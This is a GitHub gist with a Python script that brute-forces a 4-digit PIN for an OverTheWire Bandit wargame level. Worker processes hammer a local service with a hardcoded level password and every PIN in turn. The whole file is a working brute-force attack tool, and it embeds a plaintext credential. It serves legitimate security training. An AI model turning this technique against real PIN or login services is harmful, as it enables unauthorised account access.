Created
October 1, 2020 07:03
-
-
Save elimence/1007a674d02ad45c97a0cf9633d7bbba to your computer and use it in GitHub Desktop.
Python script to brute force a 4 digit pass - bandits.overthewire
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python
# coding: utf-8
# Python script to brute-force a 4-digit pass - bandits.overthewire
import math
import multiprocessing as mp
import os
import socket
import sys
import time
class Connection:
    """Brute-force worker: one TCP socket plus the half-open PIN range it tries.

    ``execute`` walks ``self.pin`` upward while ``self.pin < self.max_iter``,
    sending the password, a space, the zero-padded 4-digit PIN and a newline
    for each guess. A non-empty reply that does not contain ``Wrong`` is
    treated as success.
    """

    def __init__(self, pin = 0, max_iter = 10000, sock = None):
        """Store the PIN range and the socket to use.

        Args:
            pin: first PIN to try (inclusive).
            max_iter: upper bound of the range (exclusive).
            sock: optional pre-built socket-like object; a fresh TCP socket
                is created when it is None.
        """
        print('initizializing socket instance ...')
        self.pin = pin
        self.max_iter = max_iter
        self.password = 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ'
        # Honor an injected socket instead of silently discarding it.
        if sock is None:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock = sock

    def p_name(self):
        """Return the name of the process this code is running in."""
        return mp.current_process().name

    def connect(self, host='127.0.0.1', port=30002):
        """Connect the socket to ``(host, port)``; connection errors propagate."""
        print(self.p_name(), 'connecting ...', host, port)
        self.sock.connect((host, port))
        print(self.p_name(), 'connection successful.')

    def write(self, msg):
        """Send ``msg`` in full; text is encoded first because sockets carry bytes."""
        print(self.p_name(), 'sending', msg)
        if not isinstance(msg, bytes):
            msg = msg.encode()
        self.sock.sendall(msg)

    def read(self):
        """Return up to 4096 bytes from the socket (empty when the peer closed)."""
        print(self.p_name(), 'reading data ...')
        return self.sock.recv(4096)

    def close(self):
        """Shut down and close the socket, ignoring socket-level errors only."""
        try:
            self.sock.shutdown(socket.SHUT_RDWR)
        except socket.error:
            # Raised e.g. when the socket was never connected; still close it.
            pass
        try:
            self.sock.close()
        except socket.error:
            pass

    def execute(self, child_sig_term, prnt_sig_found):
        """Try every PIN in the range until one is accepted or a stop is requested.

        Args:
            child_sig_term: event-like object; when set, the loop stops before
                the next guess.
            prnt_sig_found: event-like object; set when a reply does not
                contain ``Wrong``.
        """
        start_time = time.time()
        first_pin = self.pin  # remembered so the summary reports the real start
        print(self.p_name(), 'exeuting attack ...')

        self.connect()
        # NOTE(review): the greeting has no trailing newline, so a line-oriented
        # server may join it with the first guess - confirm against the protocol.
        self.write('greetings !')
        welcome_str = self.read()
        print(welcome_str)

        while self.pin < self.max_iter:
            if child_sig_term.is_set():
                break

            pin_str = str(self.pin).zfill(4)
            # add newline char to flush message or it doesn't get sent
            message = self.password + " " + pin_str + "\n"
            self.write(message.encode())
            received_msg = self.read()

            if not received_msg:
                # An empty read means the peer closed the connection; that is
                # a failure, not a match, so do not signal success.
                print(self.p_name(), 'connection closed by peer at', pin_str)
                break

            # recv() returns bytes, so compare against a bytes literal.
            if b'Wrong' in received_msg:
                print(self.p_name(), 'Wrong guess %s' % pin_str)
            else:
                print('found', received_msg)
                prnt_sig_found.set()
                break

            self.pin += 1
            time.sleep(0.5)

        end_time = time.time()
        total_time = end_time - start_time
        print(self.p_name(), "start: "+str(first_pin), ' end: '+str(self.max_iter), 'total_time: ', str((total_time)/60) + ' minutes')
def main():
    """Split the PIN space 0..9999 across worker processes and run the attack.

    One ``Connection`` is created per contiguous half-open range
    ``[start, end)``; each runs ``Connection.execute`` in its own daemon
    process. The parent waits until a worker signals a match or all workers
    have exited, then asks the remaining workers to stop and cleans up.
    """
    print('main')

    connections = []
    processes = []

    # requires read/write access to /dev/shm
    prnt_sig_found = mp.Event()
    child_sig_term = mp.Event()

    MAX_ITER_COUNT = 10000
    # Never plan more workers than there are PINs to try.
    processor_count = max(1, min(mp.cpu_count(), MAX_ITER_COUNT))
    # Integer ceiling division: the ranges cover the whole space with no
    # remainder left over, and the result is an int on Python 2 and 3 alike.
    step_count = (MAX_ITER_COUNT + processor_count - 1) // processor_count

    print('Initial values ->', processor_count, step_count, 0, step_count)

    try:
        # Workers loop while pin < max_iter, so ranges are half-open and the
        # next range must begin exactly at the previous end (no "+ 1").
        for start in range(0, MAX_ITER_COUNT, step_count):
            end = min(start + step_count, MAX_ITER_COUNT)
            # NOTE(review): the socket is created here in the parent and
            # reaches the worker via the Process target; confirm this works
            # under non-fork start methods.
            conn = Connection(pin = start, max_iter = end)
            proc_name = 'BF[ ' + str(start) + ' - ' + str(end) + ' ]'
            process = mp.Process(name=proc_name, target=conn.execute, args=(child_sig_term, prnt_sig_found))
            process.daemon = True

            connections.append(conn)
            processes.append(process)

        # start all processes
        for process in processes:
            process.start()

        # Wake up periodically: stop waiting as soon as a match is signalled,
        # or when every worker has exited (otherwise a run with no match
        # would block forever on the event).
        while not prnt_sig_found.wait(0.5):
            if not any(process.is_alive() for process in processes):
                break

        if not prnt_sig_found.is_set():
            print('no worker reported a match')

        # Ask the remaining workers to stop, then give them a moment to exit.
        child_sig_term.set()
        for process in processes:
            process.join(5)
    except KeyboardInterrupt:
        print('interrupted, stopping workers ...')
    except Exception as err:
        # Top-level boundary: report the failure instead of hiding it.
        print('aborting:', repr(err))
    finally:
        child_sig_term.set()
        for conn in connections:
            conn.close()
        for process in processes:
            if process.is_alive():
                process.terminate()
# Script entry point: run the attack only when executed directly, not on import.
if __name__ == "__main__":
    main()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment